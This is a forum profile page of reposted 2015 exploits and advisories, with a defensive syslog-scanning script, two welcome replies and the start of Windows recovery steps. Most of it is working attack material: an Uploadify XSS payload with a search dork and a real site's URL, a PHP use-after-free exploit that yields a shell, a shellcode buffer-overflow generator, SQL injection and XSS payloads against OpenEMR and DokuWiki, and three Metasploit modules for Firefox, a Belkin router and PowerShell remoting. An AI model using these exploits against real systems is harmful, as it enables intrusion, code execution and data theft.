Aerosol

Everything posted by Aerosol

  1. # Affected software:
     # Type of vulnerability:
     # URL: http://www.uploadify.com/
     # Discovered by: Provensec
     # Website: http://www.provensec.com
     #version 3.1
     # Proof of concept
     uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
     demo
     http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
     dork: inurl:uploadify.swf ext:swf
     Source
  2. #Use After Free Vulnerability in unserialize()
     Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.2.3 - Release Date: 2015.3.20

     > A use-after-free vulnerability was discovered in unserialize() with a specially defined object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or executing arbitrary code.

     Affected Versions
     ------------
     Affected is PHP 5.6 < 5.6.7
     Affected is PHP 5.5 < 5.5.23
     Affected is PHP 5.4 < 5.4.39
     Affected is PHP 5 <= 5.3.29
     Affected is PHP 4 <= 4.4.9

     Credits
     ------------
     This vulnerability was disclosed by Taoguang Chen.

     Description
     ------------
     ```c
     static inline int object_common2(UNSERIALIZE_PARAMETER, zend_long elements)
     {
         zval retval;
         zval fname;

         if (Z_TYPE_P(rval) != IS_OBJECT) {
             return 0;
         }

         //??? TODO: resize before
         if (!process_nested_data(UNSERIALIZE_PASSTHRU, Z_OBJPROP_P(rval), elements, 1)) {
             return 0;
         }

         ZVAL_DEREF(rval);
         if (Z_OBJCE_P(rval) != PHP_IC_ENTRY &&
             zend_hash_str_exists(&Z_OBJCE_P(rval)->function_table, "__wakeup", sizeof("__wakeup")-1)) {
             ZVAL_STRINGL(&fname, "__wakeup", sizeof("__wakeup") - 1);
             BG(serialize_lock)++;
             call_user_function_ex(CG(function_table), rval, &fname, &retval, 0, 0, 1, NULL);
     ```
     A specially defined __wakeup() magic method leads to various problems. The simple code:
     ```php
     <?php
     class evilClass
     {
         public $var;
         function __wakeup()
         {
             unset($this->var);
             // $this->var = 'ryat';
         }
     }

     $data = unserialize('a:2:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;R:4;}');
     ?>
     ```
     Assigning or destroying object properties causes the ZVAL and all its children to be freed from memory. However, the unserialize() code will still allow R: or r: to set references to that already freed memory. This is a use-after-free vulnerability, and it allows arbitrary code execution.

     Proof of Concept Exploit
     ------------
     The PoC works on a standard MacOSX 10.10.2 installation of PHP 5.5.14.
     ```php
     <?php
     $f = $argv[1];
     $c = $argv[2];

     $fakezval1 = ptr2str(0x100b83008);
     $fakezval1 .= ptr2str(0x8);
     $fakezval1 .= "\x00\x00\x00\x00";
     $fakezval1 .= "\x06";
     $fakezval1 .= "\x00";
     $fakezval1 .= "\x00\x00";

     $data1 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';
     $x = unserialize($data1);
     $y = $x[2];

     // zend_eval_string()'s address
     $y[0][0] = "\x6d";
     $y[0][1] = "\x1e";
     $y[0][2] = "\x35";
     $y[0][3] = "\x00";
     $y[0][4] = "\x01";
     $y[0][5] = "\x00";
     $y[0][6] = "\x00";
     $y[0][7] = "\x00";

     $fakezval2 = ptr2str(0x3b296324286624); // $f($c);
     $fakezval2 .= ptr2str(0x100b83000);
     $fakezval2 .= "\xff\xff\xff\xff";
     $fakezval2 .= "\x05";
     $fakezval2 .= "\x00";
     $fakezval2 .= "\x00\x00";

     $data2 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;a:1:{i:0;R:4;}}}';
     $z = unserialize($data2);
     intval($z[2]);

     function ptr2str($ptr)
     {
         $out = "";
         for ($i=0; $i<8; $i++) {
             $out .= chr($ptr & 0xff);
             $ptr >>= 8;
         }
         return $out;
     }

     class evilClass
     {
         public $var;
         function __wakeup()
         {
             unset($this->var);
             // $this->var = 'ryat';
         }
     }
     ?>
     ```
     Test the PoC on the command line, then any PHP code can be executed:
     ```
     $ lldb php
     (lldb) target create "php"
     Current executable set to 'php' (x86_64).
     (lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
     Process 13472 launched: '/usr/bin/php' (x86_64)
     sh: no job control in this shell
     sh-3.2$ php -v
     PHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25)
     Copyright (c) 1997-2014 The PHP Group
     Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
     sh-3.2$ exit
     exit
     Process 13472 exited with status = 0 (0x00000000)
     (lldb)
     ```
     Source
  3. ```python
     #!/usr/bin/python
     #[+] Author: TUNISIAN CYBER
     #[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow
     #[+] Date: 20-03-2015
     #[+] Type: Local Exploits
     #[+] Tested on: WinXp/Windows 7 Pro
     #[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
     #[+] Friendly Sites: sec4ever.com
     #[+] Twitter: @TCYB3R
     from struct import pack

     file="evilfile.wav"
     junk="\x41"*4112
     eip = pack('<I',0x7C9D30D7)
     nops = "\x90" * 3
     #Calc.exe Shellcode
     #POC:http://youtu.be/_uvHKonqO2g
     shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
     "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3"
     "\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
     "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd"
     "\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8"
     "\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5"
     "\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87"
     "\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca")

     writeFile = open (file, "w")
     writeFile.write(junk+eip+nops+shellcode)
     writeFile.close()
     ```
     Source
  4. Advisory ID: SGMA15-001
     Title: DokuWiki persistent Cross Site Scripting
     Product: DokuWiki
     Version: 2014-09-29c and probably prior
     Vendor: www.dokuwiki.org
     Vulnerability type: Persistent XSS
     Risk level: Medium
     Credit: Filippo Cavallarin - segment.technology
     CVE: N/A
     Vendor notification: 2015-03-18
     Vendor fix: 2015-03-19
     Public disclosure: 2015-03-23

     Details
     DokuWiki version 2014-09-29c (and probably prior) is vulnerable to Persistent Cross Site Scripting in the admin page. An attacker may use this vulnerability to execute javascript in the context of a logged-in admin user. Since the vulnerable page has forms with the CSRF token (the same for all requests), a full backend compromise may be possible.
     To successfully exploit this vulnerability an attacker must:
     1. have an account on the target site
     2. trick an admin into visiting a link or editing the user account

     Proof of concept:
     1. change your account real name to: my name" autofocus onfocus="alert('code executed')
     2. login as admin and try to edit the user profile from User Manager

     Solution
     Apply the latest hotfix from the vendor's site

     References
     https://www.dokuwiki.org/
     https://github.com/splitbrain/dokuwiki/issues/1081

     Filippo Cavallarin
     https://segment.technology
     Source
  5. Advisory: Multiple reflecting/stored XSS- and SQLi-vulnerabilities in openEMR v.4.2.0
     Advisory ID: SROEADV-2015-08
     Author: Steffen Rösemann
     Affected Software: openEMR v.4.2.0 (Release-date: 28th Dec 2014)
     Vendor URL: http://www.open-emr.org
     Vendor Status: patched
     CVE-ID: to be assigned after release of advisory via OSS list

     ==========================
     Vulnerability Description:
     ==========================
     Electronic health records and medical practice management application OpenEMR 4.2.0 suffers from multiple SQL injection and reflecting XSS vulnerabilities.

     ==================
     Technical Details:
     ==================
     All vulnerabilities described below can only be exploited by an already authenticated user.

     =====================
     SQL injection vulnerabilities
     =====================
     An SQL injection vulnerability can be found in the facility_admin.php file and can be abused by an attacker via the fid-parameter.

     Exploit-Example:
     http://{TARGET}/interface/usergroup/facility_admin.php?fid=3%27+and+1=2+union+select+1,user%28%29,3,4,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+

     Another (blind) SQL injection vulnerability resides in appt_encounter_report.php and can be abused by an attacker by modifying the form_facility-parameter in a POST-request.

     Exploit-Example:
     ```
     POST /openemr-4.2.0/interface/reports/appt_encounter_report.php HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://localhost/openemr-4.2.0/interface/reports/appt_encounter_report.php
     Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
     Connection: keep-alive
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 120

     form_facility=3%27+AND+substring(version(),1,1)=%275&form_from_date=2015-01-13&form_to_date=2015-01-13&form_refresh=true
     ```

     The last (blind) SQL injection vulnerability resides in the appointments_report.php file and can likewise be abused by an attacker by crafting SQL statements in the form_facility-parameter of a POST request.

     Exploit-Example:
     ```
     POST /openemr-4.2.0/interface/reports/appointments_report.php HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://localhost/openemr-4.2.0/interface/reports/appointments_report.php
     Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
     Connection: keep-alive
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 199

     form_facility=3%27+and+substring(version(),1,1)=%274&form_provider=&form_from_date=2015-01-13&form_to_date=2015-01-13&form_apptstatus=&form_apptcat=ALL&form_orderby=comment&patient=&form_refresh=true
     ```

     ==============
     XSS vulnerabilities
     ==============
     A reflecting XSS-vulnerability can be found in user_admin.php via the id-parameter.

     Exploit-Example:
     http://{TARGET}/interface/usergroup/user_admin.php?id=4%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

     A stored XSS vulnerability resides in add_edit_event.php via the input-field "form_comments" and is executed in appointments_report.php.

     Exploit-Example:
     <script>alert(document.cookie)</script>

     =========
     Solution:
     =========
     Install the latest patch (released 21st March 2015, see [3]).

     ====================
     Disclosure Timeline:
     ====================
     12/13-Jan-2015 – found the vulnerability
     13-Jan-2015 – informed the developers
     13-Jan-2015 – release date of this security advisory [without technical details]
     13-Jan-2015 – vendor responded and announced a patch
     20-Jan-2015 – vendor provides fix for testing purposes
     20-Jan-2015 – agreement to release technical details when patch has been released
     21-Mar-2015 – release date of the patch
     22-Mar-2015 – release date of this security advisory
     22-Mar-2015 – sent to FullDisclosure

     ========
     Credits:
     ========
     Vulnerabilities found and advisory written by Steffen Rösemann.

     ===========
     References:
     ===========
     [1] http://www.open-emr.org
     [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-08.html
     [3] http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
     Source
  6. Subject: Cisco UCSM username and password hashes sent via SYSLOG
     Impact: Information Disclosure / Privilege Elevation
     Vendor: Cisco
     Product: Cisco Unified Computing System Manager (UCSM)
     Notified: 2014.10.31
     Fixed: 2015.03.06 ( 2.2(3e) )
     Author: Tom Sellers ( tom at fadedcode.net )
     Date: 2015.03.21

     Description:
     ============
     Cisco Unified Computing System Manager (UCSM) versions 1.3 through 2.2 send local (UCSM) usernames and password hashes to the configured SYSLOG server every 12 hours. If the Fabric Interconnects are in a cluster then each member will transmit the data.

     SYSLOG Example ( portions of password hash replaced with <!snip!> ):
     ```
     Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:User1,$1$e<!snip!>E.,-1.000000,16372.000000 - securityd
     Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:admin,$1$J<!snip!>71,-1.000000,16372.000000 - securityd
     Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:samdme,!,-1.000000,16372.000000 - securityd
     ```

     Vulnerable environment(s):
     ==========================
     Cisco Unified Computing System Manager (UCSM) is a Cisco product that manages all aspects of the Unified Computing System (UCS) environment including Fabric Interconnects, B-Series blade servers and the related blade chassis. C-Series (non-blade) servers can also be managed. These solutions are deployed in high performance / high density compute solutions and allow for policy based and rapid deployment of resources. They are typically found in Data Center class environments with 10/40 GB network and 8/16 GB Fibre Channel connectivity.

     Software Versions: 1.3 - 2.2(1b)A
     Hardware: Cisco 6120 XP, 6296 UP
     SYSLOG Configuration:
     - Level: Information
     - Facility: Local7
     - Faults: Enabled
     - Audits: Enabled
     - Events: Disabled

     Risks:
     ======
     1. Individuals who have access to the SYSLOG logs may not be authorized to have access to the UCSM environment and this information represents an exposure.
     2. Authorized users with the 'Operations' roles can configure SYSLOG settings, capture hashes, crack them, and elevate access to Administrator within the UCSM.
     3. SYSLOG is transmitted in plain text.

     Submitter recommendations to vendor:
     ====================================
     1. Remove the username and password hash data from the SYSLOG output.
     2. Allow the configuration of the SYSLOG destination port to enable easier segmentation of SYSLOG data on the log aggregation system.
     3. Add support for TLS wrapped SYSLOG output.

     Vendor response/resolution:
     ==========================
     After being reported on October 30, 2014 the issue was handed from Cisco PSIRT to internal development where it was treated as a standard bug. Neither the PSIRT nor Cisco TAC were able to determine the status of the effort other than it was in progress with an undetermined release date.

     On March 6, 2015 version 2.2(3e) of the UCSM software bundle was released and the release notes contained the following text:
     ---
     Cisco UCS Manager Release 1.3 through Release 2.2 no longer sends UCS Manager username and password hashes to the configured SYSLOG server every 12 hours.
     ---

     For several weeks a document related to this issue could be found in the Cisco Security Advisories, Responses, and Alerts site [1] but this has since been removed. Documents detailing similar issues [2] have been released but none reference the Bug/Defect ID I was provided and the affected versions do not match.

     The following documents remain available:
     Public URL for Defect: https://tools.cisco.com/quickview/bug/CSCur54705
     Bug Search (login required): https://tools.cisco.com/bugsearch/bug/CSCur54705
     Release notes for 2.2(3e): http://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/release/notes/ucs_2_2_rn.html#21634

     Associated vendor IDs:
     PSIRT-1394165707
     CSCur54705

     Timeline:
     ============
     2014.10.30 Reported to psirt@cisco.com
     2014.11.04 Response from PSIRT, assigned PSIRT-1394165707
     2014.11.06 Follow up questions from Cisco, response provided same day
     2014.11.12 Status request. PSIRT responded that this had been handed to development and assigned defect id CSCur54705.
     2014.12.04 As PSIRT doesn't own the bug any longer, opened TAC case requesting status.
     2014.12.10 Response from Cisco TAC indicating that perhaps I should upgrade to the latest version at that time
     2014.12.12 Discussion with TAC, unable to gather required status update internally, TAC case closed with my permission
     2015.02.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
     2015.02.05 Sent status update request to PSIRT, response was that bug was fixed internally, release pending testing, release cycle, etc.
     2015.02.11 Follow up from Cisco to ensure that no additional information was required, closure of my request with my permission
     2015.02.13 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
     2015.03.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
     2015.03.06 Update to public bug document, indicates that vulnerability is fixed in 2.2(3e)

     Reference:
     1 - http://tools.cisco.com/security/center/publicationListing.x
     2 - http://tools.cisco.com/security/center/viewAlert.x?alertId=36640 ( CVE-2014-8009 )
     Source
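A defender-side check for the exposure described in the advisory above, added here as an example (it is not part of the advisory or of any Cisco tooling): it scans collected syslog lines for the UCSM `checking user:` message and reports every entry whose second field is a crypt-style password hash rather than `!`, so a log-aggregation pipeline can alert on credential material landing in plain-text syslog. The sample lines and hash values are constructed to match the advisory's format; the source address uses the documentation range, and the `scheme` classification is an assumption based on standard modular-crypt prefixes.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Pattern for the UCSM securityd message quoted in the advisory:
# "checking user:<name>,<crypt hash or '!'>,<float>,<float> - securityd"
UCSM_USER_RE = re.compile(
    r"%USER-6-SYSTEM_MSG: checking user:(?P<user>[^,]+),(?P<secret>[^,]*),"
    r"(?P<f1>-?[\d.]+),(?P<f2>-?[\d.]+) - securityd"
)

# Modular-crypt prefixes: $1$ is MD5-crypt (the scheme seen in the advisory);
# the others are listed so the scanner also catches stronger hash formats.
CRYPT_PREFIX_RE = re.compile(r"^\$(1|2[aby]?|5|6)\$")


@dataclass
class HashLeak:
    user: str
    scheme: str   # "md5-crypt", "sha256-crypt", "sha512-crypt", "bcrypt" or "unknown"
    line: str     # the offending syslog line, kept for the ticket


def classify_secret(secret: str) -> Optional[str]:
    """Return the hash scheme if `secret` looks like a password hash, else None.
    '!' and '*' mark a locked account / no password: nothing secret is exposed."""
    if secret in ("", "!", "*"):
        return None
    m = CRYPT_PREFIX_RE.match(secret)
    if not m:
        return "unknown"
    return {"1": "md5-crypt", "5": "sha256-crypt", "6": "sha512-crypt"}.get(m.group(1), "bcrypt")


def find_hash_leaks(lines: List[str]) -> List[HashLeak]:
    """Scan syslog lines for UCSM 'checking user' messages carrying a password hash."""
    leaks = []
    for line in lines:
        m = UCSM_USER_RE.search(line)
        if not m:
            continue
        scheme = classify_secret(m.group("secret"))
        if scheme is not None:
            leaks.append(HashLeak(m.group("user"), scheme, line.rstrip()))
    return leaks


def leaked_users(lines: List[str]) -> List[str]:
    """Convenience view: just the account names whose hashes appeared in syslog."""
    return [leak.user for leak in find_hash_leaks(lines)]


# Constructed sample lines in the advisory's format (fake hashes, documentation-range IP)
SAMPLE_SYSLOG = [
    "Oct 28 23:31:37 192.0.2.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:User1,$1$eXAMPLEsa$fakeHashPlaceholder0000E.,-1.000000,16372.000000 - securityd",
    "Oct 28 23:31:37 192.0.2.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:admin,$1$JeXAMPLEs$anotherFakeHash000000071,-1.000000,16372.000000 - securityd",
    "Oct 28 23:31:37 192.0.2.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:samdme,!,-1.000000,16372.000000 - securityd",
    "Oct 28 23:31:38 192.0.2.242 : 2014 Oct 28 23:49:16 CDT: %USER-6-SYSTEM_MSG: "
    "some unrelated securityd message",
]

if __name__ == "__main__":
    for leak in find_hash_leaks(SAMPLE_SYSLOG):
        print(f"ALERT credential hash in syslog: user={leak.user} scheme={leak.scheme}")
```

The locked account (`samdme`, secret `!`) is deliberately not reported: the point of the check is hash material reaching the collector, and an alert on every `checking user` line would drown that signal in noise.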
  7. ```ruby
     ##
     # This module requires Metasploit: http://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core'
     require 'rex/exploitation/jsobfu'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = ManualRanking

       include Msf::Exploit::Remote::BrowserExploitServer
       include Msf::Exploit::Remote::BrowserAutopwn
       include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Firefox Proxy Prototype Privileged Javascript Injection',
           'Description'    => %q{
             This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect
             component and gaining a reference to the privileged chrome:// window. This exploit requires
             the user to click anywhere on the page to trigger the vulnerability.
           },
           'License'        => MSF_LICENSE,
           'Author'         => [
             'joev' # discovery and metasploit module
           ],
           'DisclosureDate' => "Jan 20 2014",
           'References'     => [
             ['CVE', '2014-8636'],
             ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'],
             ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636']
           ],
           'Targets'        => [
             [
               'Universal (Javascript XPCOM Shell)', {
                 'Platform' => 'firefox',
                 'Arch'     => ARCH_FIREFOX
               }
             ],
             [
               'Native Payload', {
                 'Platform' => %w{ java linux osx solaris win },
                 'Arch'     => ARCH_ALL
               }
             ]
           ],
           'DefaultTarget'  => 0,
           'BrowserRequirements' => {
             :source  => 'script',
             :ua_name => HttpClients::FF,
             :ua_ver  => lambda { |ver| ver.to_i.between?(31, 34) }
           }
         ))

         register_options([
           OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])
         ], self.class)
       end

       def on_request_exploit(cli, request, target_info)
         send_response_html(cli, generate_html(target_info))
       end

       def default_html
         "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."
       end

       def generate_html(target_info)
         key   = Rex::Text.rand_text_alpha(5 + rand(12))
         frame = Rex::Text.rand_text_alpha(5 + rand(12))
         r     = Rex::Text.rand_text_alpha(5 + rand(12))
         opts  = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin

         js = js_obfuscate %Q|
           var opts = #{JSON.unparse(opts)};
           var key = opts['#{key}'];
           var props = {};
           props.has = function(n){
             if (!window.top.x && n=='nodeType') {
               window.top.x=window.open("chrome://browser/content/browser.xul", "x", "chrome,,top=-9999px,left=-9999px,height=100px,width=100px");
               if (window.top.x) {
                 Object.setPrototypeOf(document, pro);
                 setTimeout(function(){
                   x.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';
                   setTimeout(function(){
                     x.messageManager.loadFrameScript('data:,'+key, false);
                     setTimeout(function(){ x.close(); }, 100)
                   }, 100)
                 }, 100);
               }
             }
           }
           var pro = Object.getPrototypeOf(document);
           Object.setPrototypeOf(document, Proxy.create(props));
         |

         %Q|
           <!doctype html>
           <html>
             <body>
               <script>
                 #{js}
               </script>
               #{datastore['CONTENT'] || default_html}
             </body>
           </html>
         |
       end

     end
     ```
     Source
  8. ```ruby
     ##
     # This module requires Metasploit: http://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = NormalRanking

       include Msf::Exploit::Remote::HttpClient
       include Msf::Exploit::CmdStager

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Belkin Play N750 login.cgi Buffer Overflow',
           'Description'    => %q{
             This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB Wireless
             Dual-Band N+ Router N750 routers. The vulnerability exists in the handling of HTTP queries
             with long 'jump' parameters addressed to the /login.cgi URL, allowing remote unauthenticated
             attackers to execute arbitrary code. This module was tested in an emulated environment, using
             the version 1.10.16.m of the firmware.
           },
           'Author'         => [
             'Marco Vaz <mv[at]integrity.pt>', # Vulnerability discovery and msf module (telnetd)
             'Michael Messner <devnull[at]s3cur1ty.de>', # msf module with echo stager
           ],
           'License'        => MSF_LICENSE,
           'Platform'       => ['linux'],
           'Arch'           => ARCH_MIPSLE,
           'References'     => [
             ['CVE', '2014-1635'],
             ['EDB', '35184'],
             ['BID', '70977'],
             ['OSVDB', '114345'],
             ['URL', 'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/'],
             ['URL', 'http://www.belkin.com/us/support-article?articleNum=4831']
           ],
           'Targets'        => [
             [ 'Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103, firmware 1.10.16.m',
               {
                 'Offset' => 1379,
               }
             ]
           ],
           'DefaultOptions' => { 'RPORT' => 8080 },
           'DisclosureDate' => 'May 09 2014',
           'DefaultTarget'  => 0))

         deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
       end

       def check
         begin
           res = send_request_cgi({
             'method' => 'GET',
             'uri'    => '/'
           })

           if res &&
               [200, 301, 302].include?(res.code) &&
               res.headers['Server'] &&
               res.headers['Server'] =~ /minhttpd/ &&
               res.body =~ /u_errpaswd/
             return Exploit::CheckCode::Detected
           end
         rescue ::Rex::ConnectionError
           return Exploit::CheckCode::Unknown
         end

         Exploit::CheckCode::Unknown
       end

       def exploit
         print_status("#{peer} - Accessing the vulnerable URL...")

         unless check == Exploit::CheckCode::Detected
           fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
         end

         print_status("#{peer} - Exploiting...")
         execute_cmdstager(
           :flavor  => :echo,
           :linemax => 200
         )
       end

       def prepare_shellcode(cmd)
         shellcode = rand_text_alpha_upper(target['Offset'])
         shellcode << 'e' << cmd
         shellcode << "\n\n"
       end

       def execute_command(cmd, opts)
         shellcode = prepare_shellcode(cmd)

         begin
           res = send_request_cgi({
             'method'    => 'POST',
             'uri'       => '/login.cgi',
             'vars_post' => {
               'GO'   => '',
               'jump' => shellcode,
             }
           })
           return res
         rescue ::Rex::ConnectionError
           fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
         end
       end

     end
     ```
     Source
  9. ```ruby
     ##
     # This module requires Metasploit: http://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core'
     require 'rex'

     class Metasploit3 < Msf::Exploit::Local
       Rank = ExcellentRanking

       include Msf::Exploit::Powershell

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Powershell Remoting Remote Command Execution',
           'Description'    => %q{
             Uses Powershell Remoting (TCP 47001) to inject payloads on target machines.
             If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise
             use a HOSTFILE to supply a list of known hostnames.
           },
           'License'        => MSF_LICENSE,
           'Author'         => [ 'Ben Campbell' ],
           'References'     => [
             [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
             [ 'OSVDB', '3106']
           ],
           'DefaultOptions' => { 'EXITFUNC' => 'thread' },
           'DisclosureDate' => 'Jan 01 1999',
           'Platform'       => [ 'win' ],
           'SessionTypes'   => [ 'meterpreter', 'shell' ],
           'Targets'        => [
             [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
           ],
           'DefaultTarget'  => 0
         ))

         register_options([
           OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
           OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
           OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]),
           OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
           OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]),
           # Move this out of advanced
           OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
           OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ])
         ])

         register_advanced_options(
           [
             OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60])
           ], self.class)
       end

       def exploit
         if !datastore['ExitOnSession'] && !job_id
           fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
         end

         unless datastore['RHOSTS'] || datastore['HOSTFILE']
           fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.")
         end

         if datastore['SMBUser'] && datastore['SMBPass'].nil?
           fail_with(Failure::BadConfig, "Need both username and password set.")
         end

         if datastore['RHOSTS']
           ip_list = "$iplist="
           Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip|
             ip_list << "'#{ip}',"
           end
           # Remove trailing comma...
           ip_list = ip_list[0..-2]
           ip_list << ";"
         end

         known_hosts = ""
         if datastore['HOSTFILE']
           ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname|
             hostname.strip!
             known_hosts << "'#{hostname}'," unless hostname.blank?
           end
           known_hosts = known_hosts[0..-2]
         end

         command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)

         ps = <<EOF
     #{generate_credentials}
     $ResultList=@(#{known_hosts});
     #{ip_list}
     foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
     Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} }
     EOF

         if datastore['SMBUser']
           ps << " -Credential $creds"
         end

         # If the host process terminates too quickly the jobs will die
         # before they spawn in a new process.
         ps << ";Sleep 20;"
         ps.gsub!("\n", "")

         command = generate_psh_command_line(
           noprofile: true,
           windowstyle: 'hidden',
           command: ps
         )

         print_status("Executing command...")
         begin
           cmd_exec(command)
         rescue Rex::TimeoutError
         end

         stime = Time.now.to_f
         loop do
           break if session_created? && datastore['ExitOnSession']
           break if datastore['ListenerTimeout'].to_i > 0 && (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f)
           Rex.sleep(1)
         end

         print_status("Completed")
       end

       def generate_credentials(domain = datastore['SMBDomain'], user = datastore['SMBUser'], pass = datastore['SMBPass'])
         creds = ""
         unless user.nil?
           creds = "$pass=ConvertTo-SecureString -string '#{pass}' -asPlainText -force;"\
             "$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist "
           if domain.nil?
             creds << "'#{user}'"
           else
             creds << "'#{domain}\\#{user}'"
           end
           creds << ",$pass;"
         end

         creds
       end

     end
     ```
     Source
  10. Dilema

      Hello and welcome, nice introduction, I hope you stick around here for a long time!
  11. Hello and welcome. The avatar says it all
  12. 1) Boot from the Windows Server 2012 ISO
      2) At the Windows Setup menu, click Next
      3) Choose Repair your computer
      4) On Choose an option, click Troubleshoot
      5) Under Advanced options, click Command Prompt

